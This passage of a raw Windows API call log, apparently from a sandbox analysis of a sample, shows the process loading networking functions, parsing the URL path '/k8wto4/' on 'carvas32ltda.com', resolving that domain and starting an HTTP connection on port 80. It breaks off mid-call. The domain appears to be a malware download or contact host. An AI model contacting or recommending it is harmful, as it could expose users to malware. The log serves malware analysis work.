returned 12 [0292.092] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoW", cchWideChar=12, lpMultiByteStr=0x634a2dc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetAddrInfoW", lpUsedDefaultChar=0x0) returned 12 [0292.093] GetProcAddress (hModule=0x75fd0000, lpProcName="GetAddrInfoW") returned 0x75fd4889 [0292.093] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetNameInfoW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0292.093] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetNameInfoW", cchWideChar=12, lpMultiByteStr=0x634a2dc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNameInfoW", lpUsedDefaultChar=0x0) returned 12 [0292.093] GetProcAddress (hModule=0x75fd0000, lpProcName="GetNameInfoW") returned 0x75fd66af [0292.093] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0292.093] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoW", cchWideChar=13, lpMultiByteStr=0x634a2dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FreeAddrInfoW", lpUsedDefaultChar=0x0) returned 13 [0292.094] GetProcAddress (hModule=0x75fd0000, lpProcName="FreeAddrInfoW") returned 0x75fd4b1b [0292.094] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetPtonW", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0292.094] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetPtonW", cchWideChar=9, lpMultiByteStr=0x634a2dc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InetPtonW", lpUsedDefaultChar=0x0) returned 9 [0292.094] GetProcAddress (hModule=0x75fd0000, lpProcName="InetPtonW") returned 0x75fe39dc [0292.094] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetNtopW", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0292.094] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetNtopW", cchWideChar=9, lpMultiByteStr=0x634a2dc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InetNtopW", lpUsedDefaultChar=0x0) returned 9 [0292.095] GetProcAddress (hModule=0x75fd0000, lpProcName="InetNtopW") returned 0x75fe3abf [0292.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0292.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x634a2dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetAddrInfoExW", lpUsedDefaultChar=0x0) returned 14 [0292.095] GetProcAddress (hModule=0x75fd0000, lpProcName="GetAddrInfoExW") returned 0x75fdd1ea [0292.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0292.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x634a2dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetAddrInfoExW", lpUsedDefaultChar=0x0) returned 14 [0292.096] GetProcAddress (hModule=0x75fd0000, lpProcName="SetAddrInfoExW") returned 0x75fdf4f6 [0292.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoExW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0292.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoExW", cchWideChar=15, lpMultiByteStr=0x634a2dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FreeAddrInfoExW", lpUsedDefaultChar=0x0) returned 15 [0292.096] GetProcAddress (hModule=0x75fd0000, lpProcName="FreeAddrInfoExW") returned 0x75fde14d [0292.096] SetErrorMode (uMode=0x8000) returned 0x1 [0292.096] LoadLibraryW (lpLibFileName="Fwpuclnt.dll") returned 0x72470000 [0292.102] SetErrorMode (uMode=0x1) returned 0x8000 [0292.102] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSASetSocketPeerTargetName", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0292.102] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSASetSocketPeerTargetName", cchWideChar=26, lpMultiByteStr=0x6366eac, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSASetSocketPeerTargetName", lpUsedDefaultChar=0x0) returned 26 [0292.103] GetProcAddress (hModule=0x72470000, lpProcName="WSASetSocketPeerTargetName") returned 0x7248bb1e [0292.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSADeleteSocketPeerTargetName", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0292.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSADeleteSocketPeerTargetName", cchWideChar=29, lpMultiByteStr=0x6366eac, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSADeleteSocketPeerTargetName", lpUsedDefaultChar=0x0) returned 29 [0292.103] GetProcAddress (hModule=0x72470000, lpProcName="WSADeleteSocketPeerTargetName") returned 0x7248bb4e [0292.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAImpersonateSocketPeer", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0292.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAImpersonateSocketPeer", cchWideChar=24, lpMultiByteStr=0x6366eac, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAImpersonateSocketPeer", lpUsedDefaultChar=0x0) returned 24 [0292.104] GetProcAddress (hModule=0x72470000, lpProcName="WSAImpersonateSocketPeer") returned 0x7248bb7e [0292.104] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAQuerySocketSecurity", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0292.104] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAQuerySocketSecurity", cchWideChar=22, lpMultiByteStr=0x635fd1c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAQuerySocketSecurity", lpUsedDefaultChar=0x0) returned 22 [0292.104] GetProcAddress (hModule=0x72470000, lpProcName="WSAQuerySocketSecurity") returned 0x7248baed [0292.104] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSARevertImpersonation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0292.104] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSARevertImpersonation", cchWideChar=22, lpMultiByteStr=0x635fd1c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSARevertImpersonation", lpUsedDefaultChar=0x0) returned 22 [0292.105] GetProcAddress (hModule=0x72470000, lpProcName="WSARevertImpersonation") returned 0x7248bcfd [0292.105] SetErrorMode (uMode=0x8000) returned 0x1 [0292.105] LoadLibraryW (lpLibFileName="IdnDL.dll") returned 0x6ee90000 [0292.135] SetErrorMode (uMode=0x1) returned 0x8000 [0292.135] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetLocaleScripts", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0292.135] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetLocaleScripts", cchWideChar=25, lpMultiByteStr=0x6366eac, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DownlevelGetLocaleScripts", lpUsedDefaultChar=0x0) returned 25 [0292.136] GetProcAddress (hModule=0x6ee90000, lpProcName="DownlevelGetLocaleScripts") returned 0x6ee92a5b [0292.136] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetStringScripts", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0292.136] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetStringScripts", cchWideChar=25, lpMultiByteStr=0x6366eac, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DownlevelGetStringScripts", lpUsedDefaultChar=0x0) returned 25 [0292.136] GetProcAddress (hModule=0x6ee90000, lpProcName="DownlevelGetStringScripts") returned 0x6ee92b2f [0292.136] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelVerifyScripts", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0292.136] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelVerifyScripts", cchWideChar=22, lpMultiByteStr=0x635fd1c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DownlevelVerifyScripts", lpUsedDefaultChar=0x0) returned 22 [0292.137] GetProcAddress (hModule=0x6ee90000, lpProcName="DownlevelVerifyScripts") returned 0x6ee92dad [0292.137] SetErrorMode (uMode=0x8000) returned 0x1 [0292.137] LoadLibraryW (lpLibFileName="Normaliz.dll") returned 0x77cd0000 [0292.151] SetErrorMode (uMode=0x1) returned 0x8000 [0292.151] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToUnicode", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0292.151] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToUnicode", cchWideChar=12, lpMultiByteStr=0x634a2dc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IdnToUnicode", lpUsedDefaultChar=0x0) returned 12 [0292.151] GetProcAddress (hModule=0x77cd0000, lpProcName="IdnToUnicode") returned 0x7781f707 [0292.152] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToNameprepUnicode", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0292.152] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToNameprepUnicode", cchWideChar=20, lpMultiByteStr=0x635fd1c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IdnToNameprepUnicode", lpUsedDefaultChar=0x0) returned 20 [0292.152] GetProcAddress (hModule=0x77cd0000, lpProcName="IdnToNameprepUnicode") returned 0x7781f6b4 [0292.152] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToAscii", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0292.152] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToAscii", cchWideChar=10, lpMultiByteStr=0x634a2dc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IdnToAscii", lpUsedDefaultChar=0x0) returned 10 [0292.153] GetProcAddress (hModule=0x77cd0000, lpProcName="IdnToAscii") returned 0x777b8bb8 [0292.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsNormalizedString", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0292.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsNormalizedString", cchWideChar=18, lpMultiByteStr=0x635fd1c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsNormalizedString", lpUsedDefaultChar=0x0) returned 18 [0292.153] GetProcAddress (hModule=0x77cd0000, lpProcName="IsNormalizedString") returned 0x7781f662 [0292.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="NormalizeString", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0292.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="NormalizeString", cchWideChar=15, lpMultiByteStr=0x634a2dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NormalizeString", lpUsedDefaultChar=0x0) returned 15 [0292.154] GetProcAddress (hModule=0x77cd0000, lpProcName="NormalizeString") returned 0x7781f5ea [0292.154] GetCurrentThreadId () returned 0x62c [0292.154] GetCurrentThreadId () returned 0x62c [0292.154] GetCurrentThreadId () returned 0x62c [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="carvas32ltda.com", cchCount2=16) returned 1 [0292.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0292.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f431, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û)", lpUsedDefaultChar=0x0) returned 0 [0292.156] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0292.156] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x635178c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="socket", lpUsedDefaultChar=0x0) returned 6 [0292.156] GetProcAddress (hModule=0x75fd0000, lpProcName="socket") returned 0x75fd3eb8 [0292.157] socket (af=2, type=1, protocol=0) returned 0x9e0 [0292.188] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0292.188] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockopt", cchWideChar=10, lpMultiByteStr=0x634a3bc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockopt", lpUsedDefaultChar=0x0) returned 10 [0292.188] GetProcAddress (hModule=0x75fd0000, lpProcName="getsockopt") returned 0x75fd737d [0292.188] getsockopt (in: s=0x9e0, level=65535, optname=4104, optval=0x534f4f8, optlen=0x534f4f4 | out: optval="\x01", optlen=0x534f4f4) returned 0 [0292.188] getsockopt (in: s=0x9e0, level=6, optname=1, optval=0x534f4f8, optlen=0x534f4f4 | out: optval="", optlen=0x534f4f4) returned 0 [0292.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0292.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x634a3bc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setsockopt", lpUsedDefaultChar=0x0) returned 10 [0292.189] GetProcAddress (hModule=0x75fd0000, lpProcName="setsockopt") returned 0x75fd41b6 [0292.189] setsockopt (s=0x9e0, level=65535, optname=4, optval="", optlen=4) returned 0 [0292.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0292.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x635178c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="htons", lpUsedDefaultChar=0x0) returned 5 [0292.190] GetProcAddress (hModule=0x75fd0000, lpProcName="htons") returned 0x75fd2d8b [0292.190] htons (hostshort=0x0) returned 0x0 [0292.190] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="bind", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0292.190] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="bind", cchWideChar=4, lpMultiByteStr=0x635178c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bind", lpUsedDefaultChar=0x0) returned 4 [0292.190] GetProcAddress (hModule=0x75fd0000, lpProcName="bind") returned 0x75fd4582 [0292.190] bind (s=0x9e0, addr=0x534f458*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0292.191] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0292.191] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x634a3bc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockname", lpUsedDefaultChar=0x0) returned 11 [0292.191] GetProcAddress (hModule=0x75fd0000, lpProcName="getsockname") returned 0x75fd30af [0292.191] getsockname (in: s=0x9e0, name=0x534f44c, namelen=0x534f4cc | out: name=0x534f44c*(sa_family=2, sin_port=0xc004, sin_addr="0.0.0.0"), namelen=0x534f4cc) returned 0 [0292.191] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0292.191] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x635178c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntohs", lpUsedDefaultChar=0x0) returned 5 [0292.192] GetProcAddress (hModule=0x75fd0000, lpProcName="ntohs") returned 0x75fd2d8b [0292.192] htons (hostshort=0x4c0) returned 0xc004 [0292.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carvas32ltda.com", cchCount1=16, lpString2="LOCALHOST", cchCount2=9) returned 1 [0292.192] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carvas32ltda.com", cchUnicodeChar=16, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 16 [0292.192] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carvas32ltda.com", cchUnicodeChar=16, lpASCIICharStr=0x637c4fc, cchASCIIChar=16 | out: lpASCIICharStr="carvas32ltda.com") returned 16 [0292.192] GetAddrInfoW (in: pNodeName="carvas32ltda.com", pServiceName=0x0, pHints=0x534f500, ppResult=0x534f520 | out: ppResult=0x534f520) returned 0 [0292.354] FreeAddrInfoW (pAddrInfo=0x2f21d50) [0292.354] htons (hostshort=0x50) returned 0x5000 [0292.354] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0292.354] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, 